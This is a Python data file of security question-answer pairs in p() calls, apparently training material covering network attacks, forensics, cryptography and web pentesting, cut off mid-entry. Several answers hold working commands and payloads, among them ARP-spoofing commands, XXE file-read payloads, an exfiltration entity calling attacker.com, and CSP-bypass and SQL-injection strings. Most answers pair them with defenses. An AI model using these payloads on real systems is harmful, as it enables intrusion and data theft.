# ── NETWORK ATTACKS ────────────────────────────────────────────────────────────

p("How do you attack SNMP (Simple Network Management Protocol)?",
  "SNMP security assessment: protocol for network device management; SNMPv1/v2c use community strings (passwords) sent in cleartext; SNMPv3 adds authentication and encryption. Enumeration: nmap -sU -p 161 --script snmp-info target (UDP port 161); onesixtyone -c community_list.txt -i targets.txt (brute force community strings); common community strings: public, private, community, admin, cisco, default, manager. MIB walking: snmpwalk -v2c -c public target (walk entire OID tree with community string public); snmpget -v2c -c public target OID (get specific value). Information obtained: system description (OS, hardware); running processes (hrSWRunName OID); network interfaces and IPs; routing table; ARP table (IP-to-MAC mappings); installed software; user accounts on some devices; SNMP community strings of other devices (if device stores them). SNMP write (community string with write access): snmpset -v2c -c private target OID TYPE VALUE; write to system description; reload device (restart OID); modify routing tables on network gear; some Cisco devices writable SNMP allows full configuration modification. SNMPv3 attacks: if weak authentication (MD5 with weak passphrase): offline brute force captured SNMPv3 authentication frames; john with snmp2john format converter. CVE examples: Cisco IOS SNMP remote code execution vulnerabilities triggered by crafted OID values; NET-SNMP remote vulnerabilities; multiple CVEs in SNMP implementations allowing unauthenticated code execution with crafted packets. Defense: disable SNMPv1/v2c; use SNMPv3 with AuthPriv level (authentication + encryption); use strong passphrases; restrict SNMP access to management VLAN; change community strings from defaults; firewall UDP 161/162 from internet.")

p("Explain ARP spoofing and how to perform a man-in-the-middle attack.",
  "ARP (Address Resolution Protocol): maps IP addresses to MAC addresses on local network; no authentication; any host can send gratuitous ARP responses claiming to be any IP. ARP spoofing (ARP poisoning): attacker sends fake ARP replies to victim and gateway; victim caches attacker MAC as gateway MAC; gateway caches attacker MAC as victim MAC; all traffic between victim and gateway passes through attacker -- MitM position. Tools: arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP (tell victim attacker is gateway); arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP (tell gateway attacker is victim); enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward (forward packets so victim connectivity maintained). Bettercap: bettercap -iface eth0; net.probe on; arp.spoof on; set arp.spoof.targets 192.168.1.5; more comprehensive; includes HTTP/HTTPS interception modules. Once in MitM position: Wireshark to capture all victim traffic; strip HTTPS (SSLstrip -- downgrade HTTPS to HTTP on redirect; victim sends credentials in clear); inject content into HTTP responses; modify downloaded executables. SSL/TLS interception (for HTTPS): requires victim to trust attacker CA certificate; corporate environments do this legitimately with deployed CA; attacker installs malicious CA via phishing + social engineering; rare in practice. Defense: Dynamic ARP Inspection (DAI) on managed switches -- validates ARP replies against DHCP snooping binding table; reject ARP replies with unexpected IP-to-MAC mapping; ARP inspection enabled on access switch ports; 802.1X port authentication; static ARP entries for gateways (impractical at scale); detection: ArpWatch monitors ARP table for changes and alerts on flips; IDS rules for excessive gratuitous ARP.")

p("How do you attack and defend against DNS attacks?",
  "DNS attack categories and defenses: (1) DNS cache poisoning (Kaminsky attack): attacker sends flood of forged DNS responses with random transaction IDs and source ports; if forged response arrives before legitimate one AND matches transaction ID and source port: caches malicious record; redirects victims to attacker server. Defense: DNSSEC (cryptographically validates responses); randomise source port (older resolvers used fixed port 53); use 0x20 encoding (randomise case in query and validate response matches). (2) DNS amplification DDoS: send DNS queries with spoofed source IP (victim's IP); DNS servers respond to victim with large amplification factor (ANY query returns large response -- 50x amplification); overwhelming victim bandwidth. Defense: response rate limiting (RRL) on authoritative servers; disable open recursors (only answer for clients in your network); configure DNS server to not respond to ANY queries. (3) DNS hijacking: compromise registrar account; change authoritative DNS servers; redirect all traffic; or compromise DNS resolver; or compromise router (change DNS server settings); BGP hijacking of DNS server IP. Defense: registrar 2FA; domain lock (transfer lock at registrar); registry lock (requires offline process to change); monitor NS records for changes. (4) DNS tunneling: encode data in DNS queries/responses; exfiltrate data bypassing DLP (DNS usually unrestricted); C2 communication via DNS; tools: dnscat2, iodine. Detection: high DNS query volume from endpoint; long subdomain labels; high-entropy domain names; DNS traffic to unusual external resolvers; non-standard DNS record types. (5) NXDomain flood: flood resolver with queries for non-existent domains; exhausts resolver resources; Negative TTL caching limits damage. (6) Zone transfer (AXFR): if misconfigured: dig AXFR @dns.target.com target.com exposes all DNS records; restrict AXFR to authorised secondary servers only.")

p("What is 802.1X network access control and how can it be attacked?",
  "802.1X: IEEE standard for port-based network access control; prevents unauthorised devices from connecting to LAN or WiFi; used in wired (Ethernet switches) and wireless (WPA2/WPA3 Enterprise). Components: Supplicant (client device seeking access); Authenticator (switch port or AP -- controls access); Authentication Server (RADIUS server -- validates credentials). EAP (Extensible Authentication Protocol) methods: PEAP/MSCHAPv2 (most common in enterprise WiFi): inner authentication is MSCHAPv2 (username/password); only server certificate validated by client; EAP-TLS (most secure): mutual certificate authentication; client presents user/machine certificate; no password -- requires PKI infrastructure; EAP-TTLS: tunnels other auth methods; similar to PEAP. 802.1X attacks: (1) Rogue AP (PEAP/MSCHAPv2): set up AP with same SSID, no server certificate validation required; client connects; presents MSCHAPv2 challenge; client responds with NTHash; attacker captures NTHash and cracks offline or uses in relay. Tool: hostapd-wpe (modified hostapd that captures credentials). (2) Certificate validation bypass: if supplicant configured to not validate server certificate (common misconfiguration -- especially Windows joined to domain); any certificate works; all credentials captured. (3) EAP-TLS attacks: weaker -- requires valid client certificate; certificate revocation bypass; stolen certificate with key. (4) MAB bypass (MAC Authentication Bypass): some 802.1X deployments fall back to MAC address authentication for devices without 802.1X supplicant (printers, IP cameras); spoof MAC of authorised device to bypass. Wired bypass: if 802.1X bypass mode: connect between authenticated device and port; observe and spoof authenticated device MAC; VLAN hopping through bypass device. Defense: enforce server certificate validation in supplicant profiles; use EAP-TLS instead of PEAP; certificate pinning; device compliance checks (NAC); quarantine VLAN for failed auth.")

# ── FORENSICS & INCIDENT RESPONSE ─────────────────────────────────────────────

p("What is the forensic investigation process for a compromised Windows system?",
  "Windows incident response and forensic investigation: Containment first: isolate host (disconnect network but preserve memory); do not reboot (volatile memory lost); image immediately. Volatile data collection (in order of volatility -- most volatile first): running processes (tasklist /v; Get-Process; Volatility pslist from memory dump); network connections (netstat -anob -- shows PID per connection; arp -a; route print); logged-on users (quser; net sessions); open files and handles (Process Hacker or handle.exe from Sysinternals); running services (sc query; Get-Service); scheduled tasks (schtasks /query /fo LIST /v). Memory acquisition: WinPmem, DumpIt, Magnet RAM Capture; write to external media; record SHA256 hash; full physical memory. Disk imaging: FTK Imager; write-block hardware; image to external drive or network share; SHA256 of image for chain of custody. Log collection: Windows Event Logs (Security, System, Application, PowerShell/Operational, Sysmon); export EVTX files; Windows XML EventLog format; LogParser or EvtxECmd for parsing. Analysis focus areas: Timeline: SuperTimeline (plaso/log2timeline) -- extract timestamps from all artefacts (file system, registry, event logs, prefetch, LNK files, browser history); create comprehensive timeline. Persistence: registry run keys; scheduled tasks; services; startup folder; WMI subscriptions; Office add-ins; browser extensions. Lateral movement: Event 4624 Type 3 (network logon); Event 4648 (explicit credential); Event 7045 (service install by remote admin tools); Event 4697 (service installed). Execution artefacts: Prefetch (C:\\Windows\\Prefetch\\*.pf) -- last 8 execution times and files accessed; Shimcache (AppCompatCache registry -- application compatibility data; records execution path and timestamp); AmCache (C:\\Windows\\AppCompat\\Programs\\Amcache.hve -- SHA256 of executables); User Assist (recent program execution). Threat hunting: search IOCs (file hashes, IPs, domains) across timeline; compare against threat intelligence.")

p("How do you perform memory forensics with Volatility?",
  "Volatility: open-source memory forensics framework; analyse Windows, Linux, macOS memory images. Basic usage: vol.py -f memory.dmp --profile=Win10x64_19041 PLUGIN; Volatility 3 (vol3): vol.py -f memory.dmp windows.PLUGIN (auto-detects profile). Profile detection: vol3: automatic; vol2: vol.py -f memory.dmp imageinfo (suggests profiles). Key plugins: Process analysis: pslist (walk EPROCESS list -- can be hidden by unlinking); pstree (tree format with parent-child); psscan (scan memory for EPROCESS structures -- finds hidden processes that unlinked from list); dlllist -p PID (DLLs loaded by process); cmdline (command line args for each process -- reveals malicious command lines). Network: netscan (active and recently closed network connections with PIDs); connections (Windows XP/2003). Code injection detection: malfind (find injected code: MZ header in executable memory region; VAD with execute bit but no backing file on disk; dumps suspicious regions); dllscan vs dlllist discrepancy = injected DLL. Dump suspicious processes: procdump -p PID --dump-dir /output/ (dump process memory to file); memdump -p PID (full process address space). Registry: hivelist (loaded registry hives); printkey -K Software\\Microsoft\\Windows\\CurrentVersion\\Run (read registry key from memory). Password extraction: hashdump (SAM hashes if SYSTEM hive loaded); lsadump (LSA secrets); mimikatz (kerberos tickets, NTLM hashes from LSASS). Rootkit detection: ssdt (System Service Descriptor Table -- hook detection; modified entries point to non-ntoskrnl code = rootkit hook); modules vs modscan (hidden drivers); driverirp (IRP hook detection). Practical workflow: run psscan and compare with pslist (discrepancy = hidden process); run netscan (suspicious external connections); run malfind on suspicious PIDs; dump and analyse suspicious regions with IDA/Ghidra.")

p("What are digital forensics chain of custody requirements?",
  "Chain of custody: documented trail of who collected, handled, analysed, and transferred digital evidence; ensures evidence integrity and admissibility in legal proceedings. Why critical: without chain of custody, defence can argue evidence was tampered with or contaminated; evidence excluded from court; case dismissed. Documentation requirements: acquisition form: date, time, location of collection; name and badge/employee ID of collector; description of evidence (device type, make, model, serial number, physical condition); unique evidence item number assigned. Hash verification: immediately upon collection, compute MD5 and SHA256 of original media; document in chain of custody form; any subsequent copy must match hash; hash mismatch = evidence integrity compromised. Transfer records: each time evidence changes hands: from, to, date, time, reason for transfer; signature of both parties; maintained throughout investigation. Storage: sealed anti-static evidence bags (protect against static discharge and contamination); tamper-evident seals; secure evidence room with access log; environmental controls (temperature, humidity for long-term storage). Analysis documentation: all actions taken on evidence documented; tools used (name, version); commands executed; outputs and findings; changes made (any analysis that modifies evidence requires forensic copy -- work on copy, preserve original). Forensic copies: write-block all media before imaging; create bit-for-bit copy (Encase, FTK Imager, dd if=/dev/sda of=image.dd bs=512); verify hash of copy matches original; all analysis performed on copy. Court presentation: expert witness qualifications; methodology explained to judge/jury; chain of custody presented; opposing counsel can challenge any break in chain. International considerations: different jurisdictions have different rules (US Federal Rules of Evidence Rule 901 for authentication; EU eIDAS for electronic evidence; UK Police and Criminal Evidence Act); cross-border cases require understanding of each jurisdiction.")

p("How do you investigate a phishing campaign after a successful compromise?",
  "Post-phishing incident response: Identify scope: examine email logs (Exchange/O365: Get-MessageTrace; Google Workspace: Gmail log search); find all recipients of phishing email; determine who clicked link (URL filtering logs, proxy logs, browser history); who entered credentials (authentication logs -- O365 sign-in logs, AD event logs). Initial triage: pull affected accounts from email analysis; check sign-in activity for each: O365: Get-AzureADAuditSignInLogs | where UserPrincipalName -eq victim@domain.com (look for unfamiliar IPs, countries); suspicious successful logins after phishing timestamp. Credential compromise indicators: logins from new IP after phishing click; inbox rules created (auto-forward to external); password change (attacker changing password to maintain access); MFA method changes (attacker adds phone number); OAuth app consent (attacker creates persistent app with O365 permissions). Email compromise investigation: check inbox rules: Get-InboxRule -Mailbox victim@domain.com (forwarding rules, delete rules hiding attacker activity); check email delegates (SendAs, FullAccess); check OAuth apps with mail permissions; check sent items and deleted items (evidence of BEC activity -- attacker may have emailed clients/vendors requesting wire transfers or credential handover). Reset and remediate: force password reset; revoke all sessions (Revoke-AzureADUserAllRefreshToken or equivalent); remove malicious inbox rules; revoke malicious OAuth app permissions; check all accounts with same email server for similar rules (lateral spread via BEC). Threat hunt: phishing email indicators (sender domain, link domain, attachment hash) -- search across all employee mailboxes; expand scope if more victims found. Root cause: examine landing page (phishing kit); identify credential harvesting site; report to hosting provider and domain registrar for takedown; notify affected clients if BEC discovered emails to external parties.")

# ── CRYPTOGRAPHY ATTACKS ─────────────────────────────────────────────────────

p("Explain common cryptographic attack techniques.",
  "Cryptographic attacks: (1) Brute force / exhaustive key search: try all possible keys; infeasible for modern key lengths (AES-128: 2^128 operations); feasible for short passwords (8-character alphanumeric: ~2^48 -- crackable with GPU in hours). (2) Dictionary attack: try words from wordlist against hash or encryption; rockyou.txt (14M passwords from 2009 breach); Hashcat with rules (append numbers, capitalise first letter, substitute l33t speak) dramatically extends coverage. (3) Rainbow table attack: precomputed hash-to-plaintext lookups for fast reversal; defeated by salting (unique random salt stored with hash; makes rainbow tables infeasible). (4) Birthday attack: find two inputs with same hash (collision) with probability ~50% after O(2^(n/2)) attempts (n = hash output bits); MD5 (128-bit): collisions in ~2^64 -- demonstrated; SHA-1 (160-bit): 2017 SHAttered attack found first collision; SHA-256 (256-bit): 2^128 -- currently safe. (5) Length extension attack: affects hash functions based on Merkle-Damgard construction (MD5, SHA-1, SHA-256 -- not SHA-256 truncated, not SHA-3, not BLAKE2); if MAC = H(secret || message), attacker can compute H(secret || message || padding || extension) without knowing secret; affects APIs using HMAC(key, message) = H(key || message) pattern; fix: use HMAC (H(key || H(key || message))) or SHA-3 or BLAKE2. (6) Padding oracle attack: CBC mode decryption with padding validation oracle (returns different error for invalid padding vs invalid MAC); attacker can decrypt any ciphertext block-by-block by sending modified ciphertexts and observing if padding error returned; POODLE (SSLv3 padding oracle); ASP.NET Padding Oracle (2010); fix: always check MAC before decryption (encrypt-then-MAC); constant-time comparison. (7) Timing attacks: measure time differences in operations to infer secret key bits; RSA exponentiation is branch-dependent; AES table lookups cause cache timing variations; constant-time implementations essential for crypto code.")

p("What is the difference between symmetric and asymmetric encryption?",
  "Symmetric encryption: same key used for encryption and decryption; fast; suitable for bulk data. Algorithms: AES (Advanced Encryption Standard): block cipher (128-bit blocks); key sizes 128, 192, or 256 bits; modes of operation matter critically: ECB (Electronic Code Book) -- same plaintext block = same ciphertext block = patterns visible -- NEVER USE for real data; CBC (Cipher Block Chaining) -- XOR each block with previous ciphertext -- IV required -- padding oracle attacks possible; CTR (Counter) -- turns block cipher into stream cipher -- generates keystream from counter + key -- no padding; GCM (Galois/Counter Mode) -- CTR + GHASH authentication tag -- AEAD (Authenticated Encryption with Associated Data) -- preferred. ChaCha20-Poly1305: stream cipher (ChaCha20) + MAC (Poly1305); AEAD; faster than AES on devices without AES-NI hardware instruction; used in TLS 1.3, WireGuard. Problem: key distribution -- how to securely share key? Asymmetric encryption: public/private key pair; public key shared freely; private key kept secret; what is encrypted with public key can only be decrypted with private key (and vice versa). Algorithms: RSA: based on difficulty of factoring large integers; 2048-bit minimum recommended (3072+ for long-term); slow (1000x slower than AES); used to encrypt symmetric keys or sign, not bulk data. ECC (Elliptic Curve Cryptography): based on elliptic curve discrete logarithm; smaller keys for equivalent security (256-bit ECC ≈ 3072-bit RSA); ECDH for key exchange; ECDSA for signing. Hybrid encryption: use RSA/ECDH to exchange symmetric key; use AES-GCM for bulk data; TLS, PGP, Signal protocol all use hybrid approach. Key exchange: Diffie-Hellman (DH): two parties exchange public values; each computes same shared secret without transmitting it; foundation of perfect forward secrecy; ECDH is elliptic curve variant -- preferred.")

p("How does the Signal protocol provide end-to-end encrypted messaging?",
  "Signal protocol: provides end-to-end encrypted messaging with forward secrecy and future secrecy (break-in recovery); used by Signal, WhatsApp, Facebook Messenger (secret conversations). Key components: (1) Extended Triple Diffie-Hellman (X3DH): initial key agreement for asynchronous messaging; each user has: IK (Identity Key -- long-term); SPK (Signed Pre-Key -- rotated monthly); OPK (One-Time Pre-Key -- batch of single-use keys); sender fetches recipient's keys from server; computes shared secret from multiple DH exchanges; provides forward secrecy if IK compromised (SPK and OPK protect past messages). (2) Double Ratchet Algorithm: once session established, two ratchets advance state: Diffie-Hellman Ratchet: each message exchange advances DH state (new ephemeral key pair per conversation turn); Symmetric Key Ratchet (KDF chain): derive per-message keys from chain key; KDF chain provides break-in recovery -- after attacker loses access to device, future messages use new ratchet state unknown to attacker; neither party can derive old keys from new state (forward secrecy preserved). (3) Sealed sender: sender's identity encrypted to recipient's key; server cannot see who is sending to whom; only recipient can verify sender. Security properties: Forward secrecy: past messages safe even if long-term keys compromised; Post-compromise security: future messages safe after temporary device compromise; Deniability: messages do not prove who sent them (any party could have created them -- same as OTR protocol); Metadata leakage: server sees who communicates with whom and when (Sealed Sender partially mitigates); phone number required for registration (privacy limitation). Comparison: OTR (Off-the-Record): earlier protocol for XMPP; no asynchronous key establishment; Signal protocol supersedes OTR; iMessage uses non-forward-secret encryption by default; WhatsApp uses Signal protocol but centralized key distribution still trusted.")

# ── MORE PENTEST TECHNIQUES ────────────────────────────────────────────────────

p("How do you test for insecure direct object references (IDOR)?",
  "IDOR (Insecure Direct Object Reference): authorisation vulnerability; application uses user-controlled identifier to access object without verifying if requester is authorised to access it. Finding IDOR: enumerate all API endpoints and their parameters; identify numeric or sequential IDs (user_id=123, order_id=456, doc_id=789); authenticated as user A, send requests with user B's IDs; if response contains user B's data -- IDOR confirmed. Parameter locations to check: URL path (/api/users/123); query string (?user_id=123); request body (JSON: {userId:123}); headers (X-User-Id: 123); cookies (user_session maps to user); hidden form fields. Types of IDOR: direct (change ID, access other user's data); horizontal privilege escalation (same privilege level, different user); vertical privilege escalation (change user_id to admin user); IDOR on actions (change account user_id in DELETE request to delete other account); IDOR on file access (file path or name as parameter -- also possible path traversal). Non-obvious IDOR: hash or GUID IDs (UUIDs not predictable but are they truly unique? Test UUIDs returned for your account in other requests); encoded IDs (base64 decode -- may reveal sequential int underneath: dXNlcl8xMjM= = user_123); indirect references (username instead of ID -- but username may be accessible for other users). Testing methodology: create two accounts; perform all actions in one account; capture all requests; replay each request authenticated as second account with first account's resource IDs; check all HTTP methods (GET, POST, PUT, DELETE, PATCH). Mass IDOR automation: Burp Intruder; param miner extension; IDOR detection scripts. Business logic: even if direct IDOR fails, test state changes -- can user B accept/reject user A's offer? CVSS: up to Critical (9.1) when PII or financial data exposed.")

p("How do you exploit XXE (XML External Entity) vulnerabilities?",
  "XXE (XML External Entity) injection: XML parsers process external entity references in DOCTYPE declarations; attacker-supplied entities can read local files, make server-side requests, or enable DoS. Basic XXE: POST XML request to server: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>; if server processes external entities and returns entity content, /etc/passwd contents returned in response. File read: file:///etc/passwd; file:///etc/shadow; file:///etc/hosts; file:///proc/self/environ (process environment variables -- may contain secrets); file:///proc/self/cmdline; application config files (file:///var/www/html/config.php, file:///home/app/.aws/credentials). SSRF via XXE: <!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'>; server fetches internal URL; output in response; access metadata service or internal APIs. Blind XXE (no output): out-of-band data exfiltration via DNS or HTTP; two-stage: stage 1 entity fetches attacker-hosted DTD file; stage 2 DTD defines entity that exfiltrates file content to attacker via HTTP query parameter: <!ENTITY % file SYSTEM 'file:///etc/passwd'><!ENTITY % exfil '<!ENTITY send SYSTEM 'http://attacker.com/?x=%file;'>'>%exfil; Burp Collaborator for OOB detection. XXE via file upload: upload SVG (contains XML) with XXE payload; Office XML formats (docx = ZIP of XML files) -- place payload in document.xml; XLSX entity injection; server processes uploaded file, triggers XXE. DoS (Billion Laughs): nested entity expansion: <!ENTITY lol 'lol'><!ENTITY lol1 '&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;'> (10 lol entities); each level multiplies 10x; 6 levels = 10^6 entities; parser uses gigabytes of memory; crash server. Defense: disable external entity processing in XML parser (the default in most modern parsers); FEATURE_DISALLOW_DOCTYPE_DECL for Java SAXParser; libxml2 LIBXML_NOENT flag disabled; avoid XML for user input when JSON possible.")

p("How do you bypass Content Security Policy (CSP)?",
  "CSP bypass techniques: CSP is browser security policy; Content-Security-Policy header restricts script sources; bypass methods: (1) Unsafe-inline bypass: if script-src includes unsafe-inline, inline script execution allowed -- XSS trivially possible; many legacy apps. (2) Wildcard bypass: script-src *.example.com allows any subdomain; if attacker can control content on any subdomain (user content, API responses, CNAME misconfiguration): load script from there. (3) JSONP bypass: script-src whitelist includes domains with JSONP endpoints (/callback?cb=evil_function); JSONP endpoint returns user-supplied callback wrapped around data -- effectively executes arbitrary JavaScript; Google, DoubleClick, Analytics JSONP endpoints commonly whitelisted. (4) Angular (AngularJS) bypass: if angular.js loaded from whitelisted CDN: AngularJS server-side template injection or expression evaluation in ng-app scope can execute code despite CSP; {{constructor.constructor('alert(1)')()}}. (5) Script gadgets: legitimate JavaScript on whitelisted domain contains eval() or innerHTML patterns; attacker triggers those code paths with DOM-based injection; jQuery source maps, Bootstrap legacy, Google Tag Manager. (6) Nonce bypass: nonce (random value per request) allows specific inline script; if server reflects nonce in HTML and attacker achieves XSS before nonce rotation (race condition); or if nonce is predictable/static. (7) Iframe bypass: frame-src allows iframes; inject iframe from attacker origin; iframe runs with attacker's CSP (or no CSP); postMessage for cross-origin communication. (8) Object/embed: if object-src not restricted; inject Flash or Java applet (obsolete). (9) base-uri bypass: base-uri not set in CSP; inject <base href='https://attacker.com/'> into page; all relative src attributes now load from attacker domain including scripts. CSP evaluator: Google CSP Evaluator (https://csp-evaluator.withgoogle.com) analyses policy for weaknesses; recommended: hash-based or nonce-based with strict-dynamic.")

p("What are HTTP request smuggling vulnerabilities?",
  "HTTP request smuggling: exploit discrepancy between how frontend proxy and backend server parse HTTP request boundaries; frontend sees one request, backend sees two -- attacker smuggles extra request that poisons next victim's request. Background: HTTP/1.1 allows two headers to specify request body length: Content-Length (CL): number of bytes in body; Transfer-Encoding chunked (TE): body split into chunks, each prefixed with hex size, terminated with 0\\r\\n\\r\\n. Vulnerability: if frontend and backend disagree on which header takes precedence: CL.TE (frontend uses CL, backend uses TE): send request with both headers; frontend forwards entire body based on CL; backend processes chunked body, sees extra data after 0 chunk as beginning of next request; that extra data prepended to next user's request -- request poisoning. TE.CL (frontend uses TE, backend uses CL): opposite discrepancy; similar impact. TE.TE (both support TE but one can be confused with obfuscated header): Transfer-Encoding: xchunked, Transfer-Encoding : chunked -- one processes, other ignores; similar to CL.TE. Impact: (1) Bypass front-end security controls: WAF/ACL rules applied at frontend; smuggled request hits backend directly; bypass IP whitelisting, authentication, URL-based ACLs. (2) Capture victim requests: smuggle partial request; next victim's request appended; victim's headers (cookies, auth tokens) captured in attacker-accessible location (comment in blog post, user profile). (3) Reflected XSS via smuggling: inject XSS payload in smuggled request; reflected in subsequent user's response. (4) Perform web cache deception: poison cache with victim's authenticated response accessible to unauthenticated attacker. Detection: Burp Suite HTTP Request Smuggler extension automates; manual: send timed requests using CL.TE and observe delays. Defense: normalise ambiguous requests at frontend; disable backend connection reuse; use HTTP/2 end-to-end (H2 has single length mechanism).")

p("How do you perform OAuth 2.0 security testing?",
  "OAuth 2.0 security testing: OAuth = authorisation framework; OpenID Connect (OIDC) = identity layer on OAuth. Flows: Authorization Code (recommended): client redirects to auth server; user authenticates; auth server redirects with code; client exchanges code for token; Implicit flow (deprecated): token returned directly in URL fragment -- token in browser history, logs; PKCE (Proof Key for Code Exchange): public clients use code challenge to prevent code interception. Attack surface: (1) CSRF on authorisation endpoint: if state parameter missing or not validated: attacker initiates auth flow; sends crafted redirect to victim; victim completes flow; attacker's code used with victim's account (account hijacking). State parameter: random nonce tied to session; validated after redirect; essential CSRF protection. (2) Open redirect in redirect_uri: if redirect_uri not strictly validated: redirect_uri=https://attacker.com; after auth, code sent to attacker; exchange for tokens; account takeover. Tests: try different values (change directory: /callback/../attacker; add extra path; URL encoding bypass). (3) Token leakage via Referer: authorization code or access token in URL; Referer header leaks to third-party resources loaded on redirect page. (4) Authorization code interception: if code lifetime too long (>10 min) and not single-use: replay code from logs, Referer. (5) Insufficient scope validation: client requests scope A; attacker sends modified request for scope admin; if server doesn't validate requested scopes against registered scopes. (6) Client credential storage: mobile apps bundle client_secret in app (reversible); extract via Jadx/apktool; use client credentials to impersonate client. (7) JWT vulnerabilities in access tokens: alg:none; weak secret; key confusion (RS256 to HS256 with public key as secret). (8) Token reuse across clients: if token audience not validated: steal token from one application, use against another. Tool: Burp Suite + OAuth extension; test state parameter, redirect_uri, scope, PKCE implementation.")

# ── FINAL PAIRS ────────────────────────────────────────────────────────────────

p("How do you exploit GraphQL APIs?",
  "GraphQL security testing: GraphQL = API query language; flexible, powerful, different attack surface than REST. (1) Introspection: {__schema{types{name fields{name}}}} or {__schema{queryType{fields{name args{name}}}}}; if introspection enabled (default on most frameworks), reveals entire API schema -- all types, queries, mutations; disabled in production on some platforms but easily overlooked. Introspection as recon: identify all available operations; find admin/debug queries not intended for public; discover object IDs and field names. (2) Field suggestion: if introspection disabled, use field typos (GraphQL returns suggestions for similar fields) -- send query with misspelled field; error response suggests real field name; map schema without introspection. (3) Batching attack: GraphQL supports multiple queries in single request -- query batching; send 1000 login attempts in one batch request; rate limiting per-request not per-query ineffective; brute force login credentials; bypass OTP rate limiting. (4) Query depth and complexity: deeply nested queries (user{friends{friends{friends{friends{...}}}}}); without depth limiting, exponential database queries; DoS. Complexity limiting mitigates. (5) IDOR in GraphQL: change node ID (user(id: 456) where you should only access id 123); same IDOR as REST but in query structure. (6) Injection in resolver: if resolver passes query argument to database or OS without sanitisation: {user(name: John; DROP TABLE users;)} for SQL injection; command injection if args used in OS commands. (7) Broken authentication: mutations (createUser, updatePassword) may lack authentication checks; test all mutations without authentication. (8) Subscription websocket: real-time data via websocket; subscribe to events for other users; missing authorisation on subscription filters. Tools: InQL (Burp extension -- introspection, query generation); graphql-voyager (visualise schema); graphw00f (fingerprint GraphQL engine); Clairvoyance (introspection without introspection query using field suggestion).")

p("What are prototype pollution attacks in JavaScript?",
  "Prototype pollution: JavaScript vulnerability where attacker modifies Object.prototype; all objects inherit from Object.prototype; polluting it affects all objects in application. How it works: JavaScript property lookup traverses prototype chain; if property not found on object, checks __proto__, then Object.prototype; attacker sends JSON: {__proto__:{isAdmin:true}} or {constructor:{prototype:{isAdmin:true}}}; if application merges this without sanitisation (lodash.merge, jQuery.extend, recursive deep merge) -- Object.prototype.isAdmin = true; every object in application now has isAdmin property. Vulnerable merge pattern: function merge(target, source) { for (let key of Object.keys(source)) { if (typeof source[key] === 'object') { merge(target[key], source[key]); } else { target[key] = source[key]; } } } -- does not check for __proto__ key. Impact -- server-side (Node.js): Remote Code Execution via AST injection (Pug, EJS template engines); code gadgets in application that use polluted properties for dangerous operations; privilege escalation (isAdmin check). Impact -- client-side: XSS if polluted property injected into sink (innerHTML, eval); logic bypass (feature flags controlled by property existence). Detection: send JSON payload with __proto__ property and check if it reflects in Object.prototype check; Burp extension for prototype pollution detection; tool: PPScan, server-side-prototype-pollution (NodeJS testing). Defense: use JSON.parse (safe) instead of recursive merge; Object.create(null) for key-value maps (no prototype chain); Map instead of plain objects; lodash 4.17.21+ fixed; validate and reject __proto__, constructor, prototype as keys; use Object.freeze(Object.prototype) at application start.")

p("How do you perform passive and active reconnaissance?",
  "Reconnaissance methodology: intelligence gathering before active exploitation. Passive recon (no direct contact with target): WHOIS: whois domain.com (registrant info, nameservers, registrar, registration date; GDPR reduced PII in public WHOIS); historical WHOIS via ViewDNS.info. DNS: dig domain.com ANY (A, MX, NS, TXT records); dig domain.com TXT (SPF, DKIM, DMARC -- reveal email providers, cloud services); subfinder, amass, assetfinder, sublist3r for subdomain enumeration; certificate transparency (crt.sh -- find subdomains from issued TLS certificates). Search engines: Google dorks: site:domain.com filetype:pdf; site:domain.com ext:sql; site:domain.com intitle:login; inurl:admin site:domain.com; Shodan.io: indexed internet-facing devices; search for target IP range or domain; finds open ports, service banners, default credentials, exposed cameras/routers/ICS. OSINT: LinkedIn (employee names, roles, technologies used in job descriptions -- reveals tech stack); Glassdoor (interview questions reveal internal tools); GitHub (leaked credentials, internal tools, API keys in public repos); pastebin sites (leaked data, credentials); Wayback Machine (old pages, old code, old configuration files); SecurityTrails (passive DNS, historical data). Active recon (direct contact with target): Port scanning: nmap -sS -p 1-65535 -T4 target (TCP SYN scan all ports); nmap -sU -p 53,67,69,123,161,500 target (UDP key ports); version detection: nmap -sV (service version); OS detection: nmap -O. Web application fingerprinting: whatweb target.com (technology detection); wappalyzer browser extension; check HTTP headers (X-Powered-By, Server, X-Generator); Burp Scanner for passive tech detection. Directory enumeration: gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt; ffuf -w wordlist.txt -u http://target.com/FUZZ; find admin panels, backup files, git repos, config files.")

p("What is Red Team versus Blue Team and how do Purple Team exercises work?",
  "Red Team vs Blue Team: Red Team: offensive security team simulating real-world threat actors; tests organisation defenses by attempting to breach systems using APT-level TTPs; go undetected as long as possible; achieve specific objectives (reach domain admin, exfiltrate sensitive data, demonstrate lateral movement to crown jewels); follows MITRE ATT&CK framework; uses realistic TTPs of relevant threat actors. Blue Team: defensive security team; monitors and detects threats; maintains SIEM, EDR, IDS/IPS, firewalls; responds to incidents; hardening, patching, vulnerability management; conducts threat hunting; operates SOC. Red Team engagement types: Assumed Breach: start inside network (simulates insider threat or successful phishing); Full Attack Simulation: external to internal; Objective-based: reach specific target (steal specified file, access HR system); Crown Jewels: test specific high-value asset protection. Purple Team: collaborative exercise where Red and Blue work together simultaneously; Red performs techniques; Blue observes whether detected; tune detections in real time; focus: maximize detection coverage and defense maturity rather than proving Blue Team failed. Purple Team benefits: direct knowledge transfer from Red to Blue; Blue learns specific attacker techniques; Red learns defender visibility gaps; MITRE ATT&CK coverage analysis before/after; faster detection improvement than black-box Red Team; CIRT readiness improvement. Red Team tools: Cobalt Strike (commercial C2 framework); Sliver (open-source alternative); Havoc (newer open-source); Brute Ratel (commercial); custom implants. Reporting: Red Team report includes: objectives achieved; attack narrative; MITRE ATT&CK techniques used; detection/alert gaps; dwell time (how long undetected); recommendations for Blue Team; Purple Team report maps each TTP to detection status and remediation.")

p("How do you attack and assess thick client desktop applications with Electron?",
